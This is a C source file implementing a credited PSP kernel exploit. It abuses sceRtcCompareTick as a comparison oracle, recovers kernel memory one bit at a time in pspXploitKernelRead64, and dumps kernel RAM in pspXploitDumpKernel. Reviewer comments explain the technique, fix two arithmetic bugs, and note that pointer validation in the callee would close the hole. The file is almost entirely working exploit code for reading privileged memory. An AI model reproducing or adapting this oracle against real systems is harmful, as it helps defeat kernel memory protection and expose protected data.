kernel_read.c
#include <time.h>
#include <pspsdk.h>
#include <psprtc.h>
/*
sceRtcCompareTick kernel exploit by davee, implementation by CelesteBlue
*/
// input: 4-byte-aligned kernel address to a 64-bit integer
// return *addr >= value;
// One-bit comparison oracle used by pspXploitKernelRead64.
//   addr:  address of the 64-bit value being probed, passed to the callee
//          unchanged as its second tick pointer
//   value: caller-owned pair of 32-bit words, reinterpreted as the 64-bit
//          probe (value[0] = low word, value[1] = high word on a
//          little-endian layout)
// Returns non-zero when sceRtcCompareTick reports probe <= *addr.
// NOTE(review): the callee is not visible here. This only discloses kernel
// memory if it dereferences addr without checking that it lies in user
// memory; validating the pointer in the callee would close the oracle.
static int is_ge_u64(uint32_t addr, uint32_t *value) {
    uint64_t *probe = (uint64_t *)value;
    uint64_t *target = (uint64_t *)addr;
    int order = (int)sceRtcCompareTick(probe, target);

    // order <= 0 means probe <= target, i.e. *addr >= value.
    return order <= 0;
}
// input: 4-byte-aligned kernel address
// return *addr
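// Reconstructs the 64-bit value at addr from comparison results alone.
// Each is_ge_u64 call reveals one bit, so a single read costs 64 calls.
// The high word is recovered first (low word of the probe held at zero),
// then the low word with the recovered high word fixed in place; within a
// word, bits are tried from most to least significant and kept whenever
// the target is still >= the probe.
// NOTE(review): assumes the comparison behind is_ge_u64 is unsigned over
// the full 64 bits - confirm.
uint64_t pspXploitKernelRead64(uint32_t addr) {
    uint32_t probe[2] = {0, 0};   // candidate handed to the oracle
    uint32_t known[2] = {0, 0};   // bits confirmed so far

    for (int word = 1; word >= 0; word--) {
        // Unsigned mask: the original `1 << 31` shifts into the sign bit
        // of a signed int, which is undefined behaviour in C.
        for (uint32_t mask = (uint32_t)1 << 31; mask != 0; mask >>= 1) {
            probe[word] = known[word] | mask;
            if (is_ge_u64(addr, probe)) {
                known[word] = probe[word];
            }
        }
        // Drop a rejected final bit before moving on to the next word.
        probe[word] = known[word];
    }

    return ((uint64_t)known[1] << 32) | known[0];
}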
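// Copies size bytes starting at src into dst, 8 bytes per iteration, using
// pspXploitKernelRead64 for every read.
//   dst:  destination buffer; it is written in whole 8-byte steps, so it
//         must have room for size rounded up to a multiple of 8
//   src:  first address to read (4-byte aligned, per pspXploitKernelRead64)
//   size: number of bytes requested; clamped so the range stops at
//         0x88400000 (presumably the end of the kernel RAM window - confirm)
// Nothing is read when src is already at or past that limit.
// NOTE(review): if the clamped size is not a multiple of 8, the last
// 8-byte read still extends up to 4 bytes past the limit.
void pspXploitDumpKernel(u32* dst, u32* src, u32 size) {
#ifdef DEBUG
    pspDebugScreenPrintf("Reading %d bytes of kernel ram @ %p\n", size, src);
#endif
    const u32 read_limit = 0x88400000;
    const u32 start = (u32)src;

    // The original test `(u32)src+size >= limit` could wrap around, and
    // `limit - src` underflowed to a huge size when src was above the limit.
    if (start >= read_limit) {
        return;
    }
    if (size >= read_limit - start) {
        size = read_limit - start;
    }

    for (u32 count = 0; count < size; count += 8) {
        u64 ret = pspXploitKernelRead64((u32)src);
        dst[0] = (uint32_t) ret;          // low word
        dst[1] = (uint32_t)(ret >> 32);   // high word
        dst += 2;                         // both pointers advance 8 bytes
        src += 2;
    }
}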